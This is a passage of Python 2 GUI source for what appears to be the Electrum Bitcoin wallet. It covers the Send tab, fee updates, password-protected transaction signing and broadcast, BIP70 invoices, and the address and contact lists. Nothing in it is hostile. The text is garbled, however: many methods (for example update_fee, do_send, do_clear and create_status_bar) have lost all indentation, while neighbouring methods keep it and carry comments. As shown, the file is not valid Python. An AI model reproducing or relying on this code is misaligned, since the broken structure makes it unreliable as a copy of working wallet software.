    """Label the Send button 'Send...' whenever a dialog follows the click
    (preview enabled, or a watching-only wallet that cannot sign)."""
    if self.show_before_broadcast() or (self.wallet and self.wallet.is_watching_only()):
        text = _("Send...")
    else:
        text = _("Send")
    self.send_button.setText(text)
def create_send_tab(self):
    """Build and return the Send tab: pay-to/amount/fee grid, the manual
    coin-selection list, and the invoices list.

    Also wires up the '!' send-max shortcut and the red/blue colouring of
    the amount and fee fields.
    """
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.setCompleter(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # Manual coin selection ("From" list); hidden until coins are chosen.
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
    self.from_list.setHeaderHidden(True)
    self.from_list.setMaximumHeight(80)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(self.fee_e_label, 5, 0)
    grid.addWidget(self.fee_e, 5, 1)
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.send_button)
    buttons.addWidget(self.clear_button)
    grid.addLayout(buttons, 6, 1, 1, 2)
    def on_shortcut():
        # '!' shortcut: compute and fill in the maximum sendable amount,
        # respecting a manually-entered fee.
        inputs = self.get_coins()
        sendable = sum(map(lambda x:x['value'], inputs))
        fee = self.fee_e.get_amount() if self.fee_e.isModified() else None
        addr = self.get_payto_or_dummy()
        amount, fee = self.wallet.get_max_amount(self.config, inputs, addr, fee)
        if not self.fee_e.isModified():
            self.fee_e.setAmount(fee)
        self.amount_e.setAmount(amount)
        self.not_enough_funds = (fee + amount > sendable)
        # emit signal for fiat_amount update
        self.amount_e.textEdited.emit("")
    self.amount_e.shortcut.connect(on_shortcut)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)
    self.fee_e.textEdited.connect(self.update_fee)
    # This is so that when the user blanks the fee and moves on,
    # we go back to auto-calculate mode and put a fee back.
    self.fee_e.editingFinished.connect(self.update_fee)
    def entry_changed():
        # Colour amount/fee fields: red when funds are short, black when
        # manually edited, blue when auto-calculated.
        text = ""
        if self.not_enough_funds:
            amt_color, fee_color = RED_FG, RED_FG
            text = _( "Not enough funds" )
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
        elif self.fee_e.isModified():
            amt_color, fee_color = BLACK_FG, BLACK_FG
        elif self.amount_e.isModified():
            amt_color, fee_color = BLACK_FG, BLUE_FG
        else:
            amt_color, fee_color = BLUE_FG, BLUE_FG
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color)
        self.fee_e.setStyleSheet(fee_color)
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    self.invoices_list = MyTreeWidget(self, self.invoices_list_menu,
                                      [_('Expires'), _('Requestor'), _('Description'), _('Amount'), _('Status')], 2)
    self.invoices_list.setSortingEnabled(True)
    self.invoices_list.header().setResizeMode(1, QHeaderView.Interactive)
    self.invoices_list.setColumnWidth(1, 200)
    self.invoices_list.on_update = self.update_invoices_list
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoices_list)
    vbox.setStretchFactor(self.invoices_list, 1000)
    # Defer this until grid is parented to avoid ugly flash during startup
    self.update_fee_edit()
    run_hook('create_send_tab', grid)
    return w
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
return self.payto_e.payto_address if self.payto_e.payto_address else self.wallet.dummy_address()
    def do_update_fee(self):
        '''Recalculate the fee. If the fee was manually input, retain it, but
        still build the TX to see if there are enough funds.
        '''
        # The fee is "frozen" when the user has edited the fee field and it
        # still holds text (or currently has keyboard focus).
        freeze_fee = (self.fee_e.isModified()
                      and (self.fee_e.text() or self.fee_e.hasFocus()))
        amount = self.amount_e.get_amount()
        if amount is None:
            # No amount entered yet: clear any auto-computed fee.
            if not freeze_fee:
                self.fee_e.setAmount(None)
            self.not_enough_funds = False
        else:
            # fee=None asks the wallet to choose a fee itself.
            fee = self.fee_e.get_amount() if freeze_fee else None
            outputs = self.payto_e.get_outputs()
            if not outputs:
                # No parseable destination yet: estimate with a stand-in output.
                addr = self.get_payto_or_dummy()
                outputs = [(TYPE_ADDRESS, addr, amount)]
            try:
                tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
                self.not_enough_funds = False
            except NotEnoughFunds:
                self.not_enough_funds = True
            if not freeze_fee:
                # Display the wallet-computed fee (or blank on insufficient funds).
                fee = None if self.not_enough_funds else self.wallet.get_tx_fee(tx)
                self.fee_e.setAmount(fee)
def update_fee_edit(self):
b = self.config.get('can_edit_fees', False)
self.fee_e.setVisible(b)
self.fee_e_label.setVisible(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, domain = None):
self.pay_from = [] if domain == [] else self.wallet.get_spendable_coins(domain)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:8] + '...' + h[-8:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, value = self.contacts.get(key)
return key + ' <' + value + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
    def protected(func):
        '''Password request wrapper. The password is passed to the function
        as the 'password' named argument. "None" indicates either an
        unencrypted wallet, or the user cancelled the password request.
        An empty input is passed as the empty string.'''
        # NOTE: defined at class scope and applied as a decorator to methods
        # that need the wallet password.
        def request_password(self, *args, **kwargs):
            parent = self.top_level_window()
            password = None
            # Prompt until check_password accepts; a cancelled (None) or empty
            # entry leaves the loop without being checked.
            while self.wallet.use_encryption:
                password = self.password_dialog(parent=parent)
                try:
                    if password:
                        self.wallet.check_password(password)
                    break
                except Exception as e:
                    # Wrong password: report and prompt again.
                    self.show_error(str(e), parent=parent)
                    continue
            kwargs['password'] = password
            return func(self, *args, **kwargs)
        return request_password
    def read_send_tab(self):
        '''Validate and collect the send tab's contents.
        Returns (outputs, fee, label, coins) on success, or None after an
        error/warning has been shown to the user.'''
        if self.payment_request and self.payment_request.has_expired():
            self.show_error(_('Payment request has expired'))
            return
        label = unicode( self.message_e.text() )
        if self.payment_request:
            # An active BIP70 payment request dictates the outputs.
            outputs = self.payment_request.get_outputs()
        else:
            errors = self.payto_e.get_errors()
            if errors:
                self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
                return
            outputs = self.payto_e.get_outputs()
            if self.payto_e.is_alias and self.payto_e.validated is False:
                # OpenAlias destination that failed DNSSEC validation:
                # require explicit user confirmation before proceeding.
                alias = self.payto_e.toPlainText()
                msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
                msg += _('Do you wish to continue?')
                if not self.question(msg):
                    return
        if not outputs:
            self.show_error(_('No outputs'))
            return
        # Sanity-check every (type, address, amount) output triple.
        for _type, addr, amount in outputs:
            if addr is None:
                self.show_error(_('Bitcoin Address is None'))
                return
            if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
                self.show_error(_('Invalid Bitcoin Address'))
                return
            if amount is None:
                self.show_error(_('Invalid Amount'))
                return
        fee = self.fee_e.get_amount()
        if fee is None:
            self.show_error(_('Invalid Fee'))
            return
        coins = self.get_coins()
        return outputs, fee, label, coins
def do_send(self):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
amount = sum(map(lambda x:x[2], outputs))
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
if tx.get_fee() < self.wallet.relayfee() and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if self.show_before_broadcast():
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
confirm_amount = self.config.get('confirm_amount', COIN)
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
extra_fee = run_hook('get_additional_fee', self.wallet, tx)
if extra_fee:
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(extra_fee) )
if tx.get_fee() >= self.config.get('confirm_fee', 100000):
msg.append(_('Warning')+ ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.use_encryption:
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
    @protected
    def sign_tx(self, tx, callback, password):
        # Thin @protected wrapper: prompts for the wallet password (if any)
        # and delegates to sign_tx_with_password.
        self.sign_tx_with_password(tx, callback, password)
    def sign_tx_with_password(self, tx, callback, password):
        '''Sign the transaction in a separate thread. When done, calls
        the callback with a success code of True or False.
        '''
        if self.wallet.use_encryption and not password:
            callback(False) # User cancelled password input
            return
        # call hook to see if plugin needs gui interaction
        run_hook('sign_tx', self, tx)
        # Success/failure continuations invoked by the waiting dialog.
        def on_signed(result):
            callback(True)
        def on_failed(exc_info):
            self.on_error(exc_info)
            callback(False)
        task = partial(self.wallet.sign_transaction, tx, password)
        WaitingDialog(self, _('Signing transaction...'), task,
                      on_signed, on_failed)
    def broadcast_transaction(self, tx, tx_desc):
        # Broadcast *tx* on a worker thread; on success, label it with
        # *tx_desc* and reset the send tab.
        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Payment request has expired")
            status, msg = self.network.broadcast(tx)
            if pr and status is True:
                # Mark the BIP70 invoice paid and send the payment ACK.
                pr.set_paid(tx.hash())
                self.invoices.save()
                self.payment_request = None
                refund_address = self.wallet.addresses()[0]
                ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
                if ack_status:
                    msg = ack_msg
            return status, msg
        # Capture current TL window; override might be removed on return
        parent = self.top_level_window()
        def broadcast_done(result):
            # GUI thread
            if result:
                status, msg = result
                if status:
                    if tx_desc is not None and tx.is_complete():
                        self.wallet.set_label(tx.hash(), tx_desc)
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoices_list.update()
                    self.do_clear()
                else:
                    parent.show_error(msg)
        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
dialog.exec_()
return clayout.selected_index()
def prepare_for_payment_request(self):
self.tabs.setCurrentIndex(1)
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
    def payment_request_ok(self):
        # A payment request was fetched and verified: store it as an invoice
        # and populate the send tab from it.
        pr = self.payment_request
        key = self.invoices.add(pr)
        status = self.invoices.get_status(key)
        self.invoices_list.update()
        if status == PR_PAID:
            # Already settled: nothing to pay, just reset the tab.
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # Color the payto field by expiry state.
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
    def pay_to_URI(self, URI):
        # Populate the send tab from a bitcoin: URI; BIP70 requests ('r', or
        # signed name) are fetched asynchronously via self.on_pr.
        if not URI:
            return
        try:
            out = util.parse_URI(unicode(URI), self.on_pr)
        except BaseException as e:
            self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
            return
        self.tabs.setCurrentIndex(1)
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        if r or (name and sig):
            # Payment-request URI: freeze the tab and wait for on_pr.
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            # trigger fiat/fee refresh, as in payment_request_ok
            self.amount_e.textEdited.emit("")
def do_clear(self):
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
l = MyTreeWidget(self, self.create_receive_menu, [ _('Address'), _('Label'), _('Balance'), _('Tx')], 1)
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.on_update = self.update_address_tab
self.address_list = l
return self.create_list_tab(l)
def create_contacts_tab(self):
l = MyTreeWidget(self, self.create_contact_menu, [_('Name'), _('Value'), _('Type')], 1, [0, 1])
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.setSortingEnabled(True)
l.on_edited = self.on_contact_edited
l.on_permit_edit = self.on_permit_contact_edit
l.on_update = self.update_contacts_tab
self.contacts_list = l
return self.create_list_tab(l)
    def update_invoices_list(self):
        # Rebuild the invoices tree from the stored invoice list; the whole
        # section is hidden when there are no invoices.
        inv_list = self.invoices.sorted_list()
        l = self.invoices_list
        l.clear()
        for pr in inv_list:
            key = pr.get_id()
            status = self.invoices.get_status(key)
            requestor = pr.get_requestor()
            exp = pr.get_expiration_date()
            date_str = util.format_time(exp) if exp else _('Never')
            item = QTreeWidgetItem([date_str, requestor, pr.memo, self.format_amount(pr.get_amount(), whitespaces=True), pr_tooltips.get(status,'')])
            item.setIcon(4, QIcon(pr_icons.get(status)))
            # Invoice id stashed on the row for the context menu.
            item.setData(0, Qt.UserRole, key)
            item.setFont(1, QFont(MONOSPACE_FONT))
            item.setFont(3, QFont(MONOSPACE_FONT))
            l.addTopLevelItem(item)
        l.setCurrentItem(l.topLevelItem(0))
        # setVisible relies on int->bool coercion of the list length.
        self.invoices_list.setVisible(len(inv_list))
        self.invoices_label.setVisible(len(inv_list))
def delete_imported_key(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_imported_key(addr)
self.address_list.update()
self.history_list.update()
def edit_account_label(self, k):
text, ok = QInputDialog.getText(self, _('Rename account'), _('Name') + ':', text = self.wallet.labels.get(k,''))
if ok:
label = unicode(text)
self.wallet.set_label(k,label)
self.address_list.update()
def account_set_expanded(self, item, k, b):
item.setExpanded(b)
self.accounts_expanded[k] = b
def create_account_menu(self, position, k, item):
menu = QMenu()
exp = item.isExpanded()
menu.addAction(_("Minimize") if exp else _("Maximize"), lambda: self.account_set_expanded(item, k, not exp))
menu.addAction(_("Rename"), lambda: self.edit_account_label(k))
if self.wallet.seed_version > 4:
menu.addAction(_("View details"), lambda: self.show_account_details(k))
menu.exec_(self.address_list.viewport().mapToGlobal(position))
    def create_receive_menu(self, position):
        # Context menu for the address list; supports single- and multi-
        # address selection.
        selected = self.address_list.selectedItems()
        multi_select = len(selected) > 1
        addrs = [unicode(item.text(0)) for item in selected]
        if not multi_select:
            item = self.address_list.itemAt(position)
            if not item:
                return
            addr = addrs[0]
            if not is_valid(addr):
                # Not an address row: either an account header (has a key in
                # role 32) or a sequence header (just toggle expansion).
                k = str(item.data(0,32).toString())
                if k:
                    self.create_account_menu(position, k, item)
                else:
                    item.setExpanded(not item.isExpanded())
                return
        menu = QMenu()
        if not multi_select:
            # Single-address actions.
            menu.addAction(_("Copy to clipboard"), lambda: self.app.clipboard().setText(addr))
            menu.addAction(_("Request payment"), lambda: self.receive_at(addr))
            menu.addAction(_("Edit label"), lambda: self.address_list.editItem(item, self.address_list.editable_columns[0]))
            menu.addAction(_('History'), lambda: self.show_address(addr))
            menu.addAction(_('Public Keys'), lambda: self.show_public_keys(addr))
            if self.wallet.can_export():
                menu.addAction(_("Private key"), lambda: self.show_private_key(addr))
            if not self.wallet.is_watching_only():
                menu.addAction(_("Sign/verify message"), lambda: self.sign_verify_message(addr))
                menu.addAction(_("Encrypt/decrypt message"), lambda: self.encrypt_message(addr))
            if self.wallet.is_imported(addr):
                menu.addAction(_("Remove from wallet"), lambda: self.delete_imported_key(addr))
            addr_URL = block_explorer_URL(self.config, 'addr', addr)
            if addr_URL:
                menu.addAction(_("View on block explorer"), lambda: webbrowser.open(addr_URL))
        # Bulk actions, offered when applicable to any selected address.
        if any(not self.wallet.is_frozen(addr) for addr in addrs):
            menu.addAction(_("Freeze"), lambda: self.set_frozen_state(addrs, True))
        if any(self.wallet.is_frozen(addr) for addr in addrs):
            menu.addAction(_("Unfreeze"), lambda: self.set_frozen_state(addrs, False))
        def can_send(addr):
            # Spendable = not frozen and has confirmed+unconfirmed balance.
            return not self.wallet.is_frozen(addr) and sum(self.wallet.get_addr_balance(addr)[:2])
        if any(can_send(addr) for addr in addrs):
            menu.addAction(_("Send From"), lambda: self.send_from_addresses(addrs))
        run_hook('receive_menu', menu, addrs, self.wallet)
        menu.exec_(self.address_list.viewport().mapToGlobal(position))
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
domain = self.wallet.get_account_addresses(self.current_account)
return self.wallet.get_spendable_coins(domain)
def send_from_addresses(self, addrs):
self.set_pay_from(addrs)
self.tabs.setCurrentIndex(1)
self.update_fee()
def paytomany(self):
self.tabs.setCurrentIndex(1)
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.tabs.setCurrentIndex(1)
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def on_permit_contact_edit(self, item, column):
# openalias items shouldn't be editable
return item.text(2) != "openalias"
def on_contact_edited(self, item, column, prior):
if column == 0: # Remove old contact if renamed
self.contacts.pop(prior)
self.set_contact(unicode(item.text(0)), unicode(item.text(1)))
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contacts_list.update() # Displays original unchanged value
return False
self.contacts[label] = ('address', address)
self.contacts_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contacts_list.update()
self.update_completions()
    def create_contact_menu(self, position):
        # Context menu for the contacts list: 'New contact' when nothing is
        # selected, otherwise bulk actions on the selection.
        menu = QMenu()
        selected = self.contacts_list.selectedItems()
        if not selected:
            menu.addAction(_("New contact"), lambda: self.new_contact_dialog())
        else:
            labels = [unicode(item.text(0)) for item in selected]
            addrs = [unicode(item.text(1)) for item in selected]
            types = [unicode(item.text(2)) for item in selected]
            menu.addAction(_("Copy to Clipboard"), lambda:
                           self.app.clipboard().setText('\n'.join(labels)))
            menu.addAction(_("Pay to"), lambda: self.payto_contacts(labels))
            menu.addAction(_("Delete"), lambda: self.delete_contacts(labels))
            # Only plain-address contacts get a block-explorer link.
            URLs = []
            for (addr, _type) in zip(addrs, types):
                if _type == 'address':
                    URLs.append(block_explorer_URL(self.config, 'addr', addr))
            if URLs:
                # NOTE: relies on Python 2's eager map() to open each URL.
                menu.addAction(_("View on block explorer"),
                               lambda: map(webbrowser.open, URLs))
        run_hook('create_contact_menu', menu, selected)
        menu.exec_(self.contacts_list.viewport().mapToGlobal(position))
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Expires") + ':'), 1, 0)
grid.addWidget(QLabel(format_time(pr.get_expiration_date())), 1, 1)
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
grid.addWidget(QLabel(_("Payment URL") + ':'), 4, 0)
grid.addWidget(QLabel(pr.payment_url), 4, 1)
grid.addWidget(QLabel(_("Outputs") + ':'), 5, 0)
outputs_str = '\n'.join(map(lambda x: x[1] + ' ' + self.format_amount(x[2])+ self.base_unit(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 5, 1)
if pr.tx:
grid.addWidget(QLabel(_("Transaction ID") + ':'), 6, 0)
l = QLineEdit(pr.tx)
l.setReadOnly(True)
grid.addWidget(l, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
return
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def invoices_list_menu(self, position):
item = self.invoices_list.itemAt(position)
if not item:
return
key = str(item.data(0, 32).toString())
pr = self.invoices.get(key)
status = self.invoices.get_status(key)
menu = QMenu()
menu.addAction(_("Details"), lambda: self.show_invoice(key))
if status == PR_UNPAID:
menu.addAction(_("Pay Now"), lambda: self.do_pay_invoice(key))
def delete_invoice(key):
self.invoices.remove(key)
self.invoices_list.update()
menu.addAction(_("Delete"), lambda: delete_invoice(key))
menu.exec_(self.invoices_list.viewport().mapToGlobal(position))
    def update_address_tab(self):
        # Rebuild the address tree: account -> receiving/change sequence ->
        # (optional 'Used' group) -> address rows. Restores the previously
        # selected address when possible.
        l = self.address_list
        item = l.currentItem()
        current_address = item.data(0, Qt.UserRole).toString() if item else None
        l.clear()
        accounts = self.wallet.get_accounts()
        if self.current_account is None:
            account_items = sorted(accounts.items())
        else:
            account_items = [(self.current_account, accounts.get(self.current_account))]
        for k, account in account_items:
            if len(accounts) > 1:
                # One top-level row per account, with its total balance.
                name = self.wallet.get_account_name(k)
                c, u, x = self.wallet.get_account_balance(k)
                account_item = QTreeWidgetItem([ name, '', self.format_amount(c + u + x), ''])
                account_item.setExpanded(self.accounts_expanded.get(k, True))
                account_item.setData(0, Qt.UserRole, k)
                l.addTopLevelItem(account_item)
            else:
                # Single account: hang everything directly off the tree root.
                account_item = l
            sequences = [0,1] if account.has_change() else [0]
            for is_change in sequences:
                if len(sequences) > 1:
                    name = _("Receiving") if not is_change else _("Change")
                    seq_item = QTreeWidgetItem( [ name, '', '', '', ''] )
                    account_item.addChild(seq_item)
                    if not is_change:
                        seq_item.setExpanded(True)
                else:
                    seq_item = account_item
                # 'Used' group is inserted lazily when the first used address
                # of this sequence is encountered.
                used_item = QTreeWidgetItem( [ _("Used"), '', '', '', ''] )
                used_flag = False
                addr_list = account.get_addresses(is_change)
                for address in addr_list:
                    num = len(self.wallet.history.get(address,[]))
                    is_used = self.wallet.is_used(address)
                    label = self.wallet.labels.get(address,'')
                    c, u, x = self.wallet.get_addr_balance(address)
                    balance = self.format_amount(c + u + x)
                    item = QTreeWidgetItem([address, label, balance, "%d"%num])
                    item.setFont(0, QFont(MONOSPACE_FONT))
                    item.setData(0, Qt.UserRole, address)
                    item.setData(0, Qt.UserRole+1, True) # label can be edited
                    # Background colors flag frozen and beyond-gap-limit rows.
                    if self.wallet.is_frozen(address):
                        item.setBackgroundColor(0, QColor('lightblue'))
                    if self.wallet.is_beyond_limit(address, account, is_change):
                        item.setBackgroundColor(0, QColor('red'))
                    if is_used:
                        if not used_flag:
                            seq_item.insertChild(0, used_item)
                            used_flag = True
                        used_item.addChild(item)
                    else:
                        seq_item.addChild(item)
                    if address == current_address:
                        l.setCurrentItem(item)
    def update_contacts_tab(self):
        # Rebuild the contacts tree, preserving the current selection.
        l = self.contacts_list
        item = l.currentItem()
        current_key = item.data(0, Qt.UserRole).toString() if item else None
        l.clear()
        for key in sorted(self.contacts.keys()):
            _type, value = self.contacts[key]
            item = QTreeWidgetItem([key, value, _type])
            item.setData(0, Qt.UserRole, key)
            l.addTopLevelItem(item)
            if key == current_key:
                l.setCurrentItem(item)
        # Let plugins decorate the rebuilt list.
        run_hook('update_contacts_tab', l)
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: apply( f, (method, args, self.password_dialog ))
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def change_account(self,s):
if s == _("All accounts"):
self.current_account = None
else:
accounts = self.wallet.get_account_names()
for k, v in accounts.items():
if v == s:
self.current_account = k
self.history_list.update()
self.update_status()
self.address_list.update()
self.receive_list.update()
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.account_selector = QComboBox()
self.account_selector.setSizeAdjustPolicy(QComboBox.AdjustToContents)
self.connect(self.account_selector, SIGNAL("activated(QString)"), self.change_account)
sb.addPermanentWidget(self.account_selector)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
